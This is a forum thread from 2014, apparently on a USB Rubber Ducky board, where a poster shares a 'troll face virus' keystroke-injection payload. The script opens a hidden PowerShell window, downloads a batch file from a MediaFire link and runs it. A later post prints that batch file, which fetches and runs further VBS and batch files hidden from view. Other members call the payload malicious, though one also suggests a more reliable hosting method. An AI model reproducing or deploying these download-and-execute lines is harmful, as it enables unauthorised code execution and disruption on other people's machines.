Haxineer1337 Posted January 16, 2014 Share Posted January 16, 2014 (edited) [Told you it was coming soon...] [bROKEN AS OF NOW, MEDIAFIRE HATES ME]TROLL FACE VIRUS PAYLOAD: [What it does]: Runs powershell to wget and execute a bat file that wgets and executes the requirements[HIDDEN]Every 60 seconds it loads up your browser if not already opened and opens a troll face.The only way to remove it is to go to task manager and end cmd.exe and timeout.exe.Works on windows 7, replace CONTROL ESCAPE with GUI r for it to work withwindows 8 and 7. Working on startup persistenceSCRIPT: DELAY 20000CONTROL ESCAPEDELAY 1100STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://download1585.mediafire.com/3j2upgu7avbg/8runbhhu8fjrjah/Runner1.bat','C:\windowstp.bat'); Start-Process "C:\windowstp.bat"ENTER Edited January 17, 2014 by Haxineer1337 Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted January 16, 2014 Share Posted January 16, 2014 This is just malicious and all it would do is take up some poor admins time to fix it. Spreading across a network just exacerbates the problem. Teach people about physical security by demontration, not causing harm to them or interrupting their work flow - that doesn't help anyone. Quote Link to comment Share on other sites More sharing options...
Haxineer1337 Posted January 16, 2014 Author Share Posted January 16, 2014 This is just malicious and all it would do is take up some poor admins time to fix it. Spreading across a network just exacerbates the problem. Teach people about physical security by demontration, not causing harm to them or interrupting their work flow - that doesn't help anyone. Then what's the point of having a ducky if you are using it for "demonstration"? I payed 50 dollars for something that makes me laugh, not "demonstrate". Quote Link to comment Share on other sites More sharing options...
overwraith Posted January 16, 2014 Share Posted January 16, 2014 Don't want to really take sides here, but we should all bear in mind that the USB rubber ducky is first and foremost a script running tool. If we are going to draw lines here, we should bear in mind that even some of the payloads like mine are merely batch and powershell scripts. Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted January 16, 2014 Share Posted January 16, 2014 (edited) Then what's the point of having a ducky if you are using it for "demonstration"? I payed 50 dollars for something that makes me laugh, not "demonstrate". By all means, demonstrate to a person or corporation the risks posed by physical security, but what you're proposing is just causing unnecessary harm and wasting the time of other people. Dunno about you, but I see hacking as way of furthering my own understanding and fixing holes in security - not deliberately using my own knowledge to harm or annoy others. Also, you obviously haven't tested your script - the download points to mediafire. Try wgetting that, all you get is a html page.. Don't want to really take sides here, but we should all bear in mind that the USB rubber ducky is first and foremost a script running tool. If we are going to draw lines here, we should bear in mind that even some of the payloads like mine are merely batch and powershell scripts. I understand where you're coming from, and there's nothing wrong with payloads that download and run scripts. Its what the script does that's the problem. Changing someones wallpaper or planting a backdoor isn't anything like causing popups every minute - and they're persistent after reboot.. Edited January 16, 2014 by Xcellerator Quote Link to comment Share on other sites More sharing options...
Haxineer1337 Posted January 17, 2014 Author Share Posted January 17, 2014 (edited) By all means, demonstrate to a person or corporation the risks posed by physical security, but what you're proposing is just causing unnecessary harm and wasting the time of other people. Dunno about you, but I see hacking as way of furthering my own understanding and fixing holes in security - not deliberately using my own knowledge to harm or annoy others. Also, you obviously haven't tested your script - the download points to mediafire. Try wgetting that, all you get is a html page.. I understand where you're coming from, and there's nothing wrong with payloads that download and run scripts. Its what the script does that's the problem. Changing someones wallpaper or planting a backdoor isn't anything like causing popups every minute - and they're persistent after reboot.. @xcell You obviously haven't tested it either [or been to preschool for that matter], because that, my friend, is a direct download link. It has been fully tested and works 100%. Good day, sir. PS: Do you really think that pop ups are more dangerous than a backdoor? Back doors let you take full control of their computer. You can delete files, use their webcam, open 100s of web pages, etc.. That interrupts their work flow even more than a pop up powershell that's easy to get rid of. Edited January 17, 2014 by Haxineer1337 Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted January 17, 2014 Share Posted January 17, 2014 (edited) How about you try: wget http://download1585.mediafire.com/3j2upgu7avbg/8runbhhu8fjrjah/Runner1.bat; cat Runner1.bat and then tell me it works. I see no reason for you to be offensive (the preschool remark), I've merely given my opinion that I think what you're doing is immoral and not in vein with what (the majority) of this community is about. I also pointed out an actual problem with your script (although I disagree with its purpose, I think that the execution is clever). Mediafire don't allow direct downloads via links, they want you to go to their site and click the link manually which forwards you around some PHP (or ASP, whatever they use..) to serve up the download. It stops people mass downloading huge files from their servers and clogging up their bandwidth. A better idea would be stick it on pastebin and use the raw link they'll give you (seeing as it's essentially just text files your downloading). I wrote a ducky script using this technique to add an open wifi network to a windows machine (to autoconnect to the pineapple) You can see it here if you like: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---Pineapple-Assocation-(VERY-FAST) Backdoors can be used a demonstration of "hey look, in just a few seconds I installed this thing that lets me access all your stuff - you should really fix this so that someone doesn't come along and cause some real damage" - that's what I'd use it for anyway.. Edited January 17, 2014 by Xcellerator Quote Link to comment Share on other sites More sharing options...
Haxineer1337 Posted January 17, 2014 Author Share Posted January 17, 2014 Sorry about the preschool remark. I know media fire doesn't allow direct links. I got it by right clicking the download button, selecting inspect element, and finding the link that the button lead you to. I've tested it on another computer and it's worked. Quote Link to comment Share on other sites More sharing options...
overwraith Posted January 17, 2014 Share Posted January 17, 2014 Can someone please post the code in a code box? I am in fear of downloading the thing, and accidentally running it, but I want to see it. Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted January 17, 2014 Share Posted January 17, 2014 Sorry about the preschool remark. I know media fire doesn't allow direct links. I got it by right clicking the download button, selecting inspect element, and finding the link that the button lead you to. I've tested it on another computer and it's worked. Well, the machines I've tested on (powershell in windows, and wget in linux) both just downloaded a web page. What version of windows did you test on? Can you post a screenshot of the download being successful? As in the powershell command (without the hidden window style bit) and then 'type' the bat file? Can someone please post the code in a code box? I am in fear of downloading the thing, and accidentally running it, but I want to see it. @echo off powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://download1505.mediafire.com/uqxpahdvmi5g/iqgb5774sqcyu7c/updater.vbs','C:\updater.vbs') powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://download1647.mediafire.com/dhhclv61cblg/gjnalpa67hvpb43/update.bat','C:\update.bat') powershell -windowstyle hidden Start-Process "C:\updater.vbs" This is what the initial bat file is when you download it through mediafire. Quote Link to comment Share on other sites More sharing options...
Haxineer1337 Posted January 17, 2014 Author Share Posted January 17, 2014 Well, the machines I've tested on (powershell in windows, and wget in linux) both just downloaded a web page. What version of windows did you test on? Can you post a screenshot of the download being successful? As in the powershell command (without the hidden window style bit) and then 'type' the bat file? @echo off powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://download1505.mediafire.com/uqxpahdvmi5g/iqgb5774sqcyu7c/updater.vbs','C:\updater.vbs') powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://download1647.mediafire.com/dhhclv61cblg/gjnalpa67hvpb43/update.bat','C:\update.bat') powershell -windowstyle hidden Start-Process "C:\updater.vbs" This is what the initial bat file is when you download it through mediafire. Ok. I will provide screenshots soon. Quote Link to comment Share on other sites More sharing options...
overwraith Posted January 17, 2014 Share Posted January 17, 2014 (edited) Actually there is a code box built into the forums here, looks like a little button with a greater than less than symbol <> . Smack in the center of the buttons at the top of the form. So you can just paste text into it. Edited January 17, 2014 by overwraith Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.